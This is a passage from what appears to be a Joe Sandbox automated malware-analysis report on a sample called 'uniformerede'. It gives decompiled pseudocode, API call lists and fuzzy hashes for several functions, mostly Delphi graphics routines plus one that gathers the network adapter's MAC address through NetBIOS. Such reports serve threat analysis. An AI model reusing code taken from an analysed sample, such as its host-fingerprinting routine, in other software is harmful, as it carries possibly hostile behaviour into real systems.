                                                                                                                                                                                                                            					_t36 = GetSystemMetrics(0xc);
                                                                                                                                                                                                                            					 *(_a4 + 4) = _t36;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_v44 = _t36;
                                                                                                                                                                                                                            				if(_v44 == 0) {
                                                                                                                                                                                                                            					E00425F64(_t51);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_t68);
                                                                                                                                                                                                                            				_push(0x426b89);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t70;
                                                                                                                                                                                                                            				_push(0xe);
                                                                                                                                                                                                                            				_t37 = _v44;
                                                                                                                                                                                                                            				_push(_t37);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                                                            				_t38 = _v44;
                                                                                                                                                                                                                            				_push(_t38);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_t39 = _t37 * _t38;
                                                                                                                                                                                                                            				if(_t39 <= 8) {
                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                            					_v32 = 1 << _t39;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v32 = 0x7fffffff;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t61);
                                                                                                                                                                                                                            				 *[fs:eax] = _t61;
                                                                                                                                                                                                                            				_push(0x426b90);
                                                                                                                                                                                                                            				_t43 = _v44;
                                                                                                                                                                                                                            				_push(_t43);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t43;
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AEE
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AFA
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00426B16
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3145338429-0
                                                                                                                                                                                                                            • Opcode ID: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                                                                                                                                                                                            • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct HDC__* _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct HDC__* _t29;
                                                                                                                                                                                                                            				struct tagBITMAPINFO* _t32;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				struct HBITMAP__* _t43;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = __ecx;
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				E00426DC0(__eax, _a4, __ecx);
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_push(_t46);
                                                                                                                                                                                                                            				_push(0x426fad);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(__edx);
                                                                                                                                                                                                                            					_t29 = _v16;
                                                                                                                                                                                                                            					_push(_t29);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					_v12 = _t29;
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L00407418();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                                                                                                                                                                                                            				_pop(_t39);
                                                                                                                                                                                                                            				 *[fs:eax] = _t39;
                                                                                                                                                                                                                            				_push(0x426fb4);
                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return DeleteDC(_v16);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426F32
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,00426FB4,?,00000000), ref: 00426F9E
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00426FA7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3837315262-0
                                                                                                                                                                                                                            • Opcode ID: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                                                                                                                                                                                            • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E00473BA4(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct HDC__* _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct HDC__* _t29;
                                                                                                                                                                                                                            				struct tagBITMAPINFO* _t32;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				struct HBITMAP__* _t43;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = __ecx;
                                                                                                                                                                                                                            				_t43 = __eax;
                                                                                                                                                                                                                            				E00473A5C(__eax, _a4, __ecx);
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_push(_t46);
                                                                                                                                                                                                                            				_push(0x473c41);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t46 + 0xfffffff4;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(__edx);
                                                                                                                                                                                                                            					_t29 = _v16;
                                                                                                                                                                                                                            					_push(_t29);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            					_v12 = _t29;
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L00407418();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                                                                                                                                                                                                            				_pop(_t39);
                                                                                                                                                                                                                            				 *[fs:eax] = _t39;
                                                                                                                                                                                                                            				_push(0x473c48);
                                                                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					L00407440();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return DeleteDC(_v16);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00473A5C: GetObjectA.GDI32(?,00000054,?), ref: 00473A75
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00473BC6
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,00000000,00473C41,?,00000000), ref: 00473BE7
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,00000000,00473C41,?,00000000), ref: 00473BF3
                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00473C0A
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,00473C48,00000000,?,?,?,00000000,00000000,00473C41,?,00000000), ref: 00473C32
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00473C3B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3837315262-0
                                                                                                                                                                                                                            • Opcode ID: 3b15324fb2290ca1488513c0eeb56040cb136c7a7d0ea080c595af7f481eebf9
                                                                                                                                                                                                                            • Instruction ID: 2e63988e96734921cea6db955d31d5c4bae8c35103de8be847097433fcca094d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b15324fb2290ca1488513c0eeb56040cb136c7a7d0ea080c595af7f481eebf9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E114275E042047FDB11DFA98C42F9EBBEC9B48714F5084AAB918F7281D678AA009769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00426750(struct HDC__* __eax, signed int __ecx) {
                                                                                                                                                                                                                            				char _v1036;
                                                                                                                                                                                                                            				signed int _v1038;
                                                                                                                                                                                                                            				struct tagRGBQUAD _v1048;
                                                                                                                                                                                                                            				short _v1066;
                                                                                                                                                                                                                            				short* _t15;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				struct HDC__* _t23;
                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                            				short* _t31;
                                                                                                                                                                                                                            				short* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                            				 *_t32 = 0x300;
                                                                                                                                                                                                                            				if(__eax == 0) {
                                                                                                                                                                                                                            					_v1038 = __ecx;
                                                                                                                                                                                                                            					E004029DC(_t26, __ecx << 2,  &_v1036);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_t23 = __eax;
                                                                                                                                                                                                                            					_t18 = SelectObject(__eax, __eax);
                                                                                                                                                                                                                            					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                                                                                                                                                                                                            					SelectObject(_t23, _t18);
                                                                                                                                                                                                                            					DeleteDC(_t23);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v1038 != 0) {
                                                                                                                                                                                                                            					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
                                                                                                                                                                                                                            						E00426548( &_v1036, _v1038 & 0x0000ffff);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t15 = _t32;
                                                                                                                                                                                                                            					_push(_t15);
                                                                                                                                                                                                                            					L00407308();
                                                                                                                                                                                                                            					_t31 = _t15;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                                                                                                                                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00426798
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1056449717-0
                                                                                                                                                                                                                            • Opcode ID: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                                                                                                                                                                                            • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00425E34(void* __eax) {
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t36 = __eax;
                                                                                                                                                                                                                            				UnrealizeObject(E00425610( *((intOrPtr*)(__eax + 0x14))));
                                                                                                                                                                                                                            				SelectObject( *(_t36 + 4), E00425610( *((intOrPtr*)(_t36 + 0x14))));
                                                                                                                                                                                                                            				if(E004256F0( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                                                                                                                                                                                                            					SetBkColor( *(_t36 + 4),  !(E00424950(E004255D4( *((intOrPtr*)(_t36 + 0x14))))));
                                                                                                                                                                                                                            					return SetBkMode( *(_t36 + 4), 1);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					SetBkColor( *(_t36 + 4), E00424950(E004255D4( *((intOrPtr*)(_t36 + 0x14)))));
                                                                                                                                                                                                                            					return SetBkMode( *(_t36 + 4), 2);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00425610: CreateBrushIndirect.GDI32(?), ref: 004256BA
                                                                                                                                                                                                                            • UnrealizeObject.GDI32(00000000), ref: 00425E40
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00425E52
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00425E75
                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000002), ref: 00425E80
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00425E9B
                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00425EA6
                                                                                                                                                                                                                              • Part of subcall function 00424950: GetSysColor.USER32(?), ref: 0042495A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3527656728-0
                                                                                                                                                                                                                            • Opcode ID: 29ec3b8dcb5869ceba3248ca83c7fd6d6bfb65d219b60a6aaf33f7a556ae5792
                                                                                                                                                                                                                            • Instruction ID: f3953004702be4b33cbf574d844c3777e64eede3f5404583a563c06caea0bc6c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29ec3b8dcb5869ceba3248ca83c7fd6d6bfb65d219b60a6aaf33f7a556ae5792
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEF0BBB56001109BCE04FFBAE9C6E1B7B9C5F04309780845AB908EF297C979E850473A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E00475658(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				signed char* _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                            				char* _t115;
                                                                                                                                                                                                                            				void* _t116;
                                                                                                                                                                                                                            				intOrPtr _t145;
                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                                                                            				intOrPtr _t156;
                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t155 = _t156;
                                                                                                                                                                                                                            				_t116 = 5;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t116 = _t116 - 1;
                                                                                                                                                                                                                            				} while (_t116 != 0);
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t155);
                                                                                                                                                                                                                            				_push(0x475868);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t156;
                                                                                                                                                                                                                            				E004049C0(_v8);
                                                                                                                                                                                                                            				E004049C0( &_v20);
                                                                                                                                                                                                                            				_t115 = E0040275C(0x40);
                                                                                                                                                                                                                            				E004032B4(_t115, 0x40);
                                                                                                                                                                                                                            				_v16 = E0040275C(0x100);
                                                                                                                                                                                                                            				E004032B4(_v16, 0x100);
                                                                                                                                                                                                                            				_t152 = E0040275C(0x3c);
                                                                                                                                                                                                                            				E004032B4(_t152, 0x3c);
                                                                                                                                                                                                                            				 *_v16 = 0;
                                                                                                                                                                                                                            				 *_t115 = 0x37;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t115 + 4)) = _v16;
                                                                                                                                                                                                                            				 *((short*)(_t115 + 8)) = 4;
                                                                                                                                                                                                                            				_push(_t115);
                                                                                                                                                                                                                            				L00472C18();
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					E004032B4(_t115, 0x40);
                                                                                                                                                                                                                            					 *_t115 = 0x32;
                                                                                                                                                                                                                            					 *((char*)(_t115 + 0x30)) = _v16[_v12 + 1];
                                                                                                                                                                                                                            					_push(_t115);
                                                                                                                                                                                                                            					L00472C18();
                                                                                                                                                                                                                            					E004032B4(_t115, 0x40);
                                                                                                                                                                                                                            					 *_t115 = 0x33;
                                                                                                                                                                                                                            					_t79 = _v16[_v12 + 1];
                                                                                                                                                                                                                            					 *((char*)(_t115 + 0x30)) = _t79;
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					_t152 = _t152;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t115 + 4)) = 0x475878;
                                                                                                                                                                                                                            					 *((short*)(_t115 + 8)) = 0x3c;
                                                                                                                                                                                                                            					_push(_t115);
                                                                                                                                                                                                                            					L00472C18();
                                                                                                                                                                                                                            					if(_t79 == 0 || _t79 == 6) {
                                                                                                                                                                                                                            						E00409600( &_v24, 2);
                                                                                                                                                                                                                            						_push(_v24);
                                                                                                                                                                                                                            						_push(0x475890);
                                                                                                                                                                                                                            						E00409600( &_v28, 2);
                                                                                                                                                                                                                            						_push(_v28);
                                                                                                                                                                                                                            						_push(0x475890);
                                                                                                                                                                                                                            						E00409600( &_v32, 2);
                                                                                                                                                                                                                            						_push(_v32);
                                                                                                                                                                                                                            						_push(0x475890);
                                                                                                                                                                                                                            						E00409600( &_v36, 2);
                                                                                                                                                                                                                            						_push(_v36);
                                                                                                                                                                                                                            						_push(0x475890);
                                                                                                                                                                                                                            						E00409600( &_v40, 2);
                                                                                                                                                                                                                            						_push(_v40);
                                                                                                                                                                                                                            						_push(0x475890);
                                                                                                                                                                                                                            						E00409600( &_v44, 2);
                                                                                                                                                                                                                            						_push(_v44);
                                                                                                                                                                                                                            						E00404D40();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v12 = _v12 + 1;
                                                                                                                                                                                                                            					_t162 = ( *_v16 & 0x000000ff) - _v12;
                                                                                                                                                                                                                            					if(_t162 <= 0) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00404DCC(_v20, "00-00-00-00-00-00");
                                                                                                                                                                                                                            					if(_t162 == 0) {
                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0040277C(_t115);
                                                                                                                                                                                                                            				E0040277C(_t152);
                                                                                                                                                                                                                            				E0040277C(_v16);
                                                                                                                                                                                                                            				E00404A14(_v8, _v20);
                                                                                                                                                                                                                            				_pop(_t145);
                                                                                                                                                                                                                            				 *[fs:eax] = _t145;
                                                                                                                                                                                                                            				_push(0x47586f);
                                                                                                                                                                                                                            				return E004049E4( &_v44, 7);
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Netbios.NETAPI32(00000000), ref: 004756F1
                                                                                                                                                                                                                            • Netbios.NETAPI32(00000000), ref: 0047571C
                                                                                                                                                                                                                            • Netbios.NETAPI32(00000000), ref: 00475757
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Netbios
                                                                                                                                                                                                                            • String ID: 00-00-00-00-00-00$<
                                                                                                                                                                                                                            • API String ID: 544444789-41023692
                                                                                                                                                                                                                            • Opcode ID: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                                                                                                                                                                                            • Instruction ID: dc29ca18e00d15a9725c9b3c649b13ae9c6c43c4cf661d243729a07c7496b8e6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A5183346045449BDB01EFA9C882BDEBBF5AF4C304F5584BEE458BB383C6789901CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                            			E0042AE8C(intOrPtr* __eax, void* __edx) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				struct HPALETTE__* _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				intOrPtr _v25;
                                                                                                                                                                                                                            				intOrPtr _v29;
                                                                                                                                                                                                                            				intOrPtr _v33;
                                                                                                                                                                                                                            				intOrPtr _v57;
                                                                                                                                                                                                                            				short _v59;
                                                                                                                                                                                                                            				short _v61;
                                                                                                                                                                                                                            				intOrPtr _v65;
                                                                                                                                                                                                                            				intOrPtr _v69;
                                                                                                                                                                                                                            				intOrPtr _v73;
                                                                                                                                                                                                                            				intOrPtr _v77;
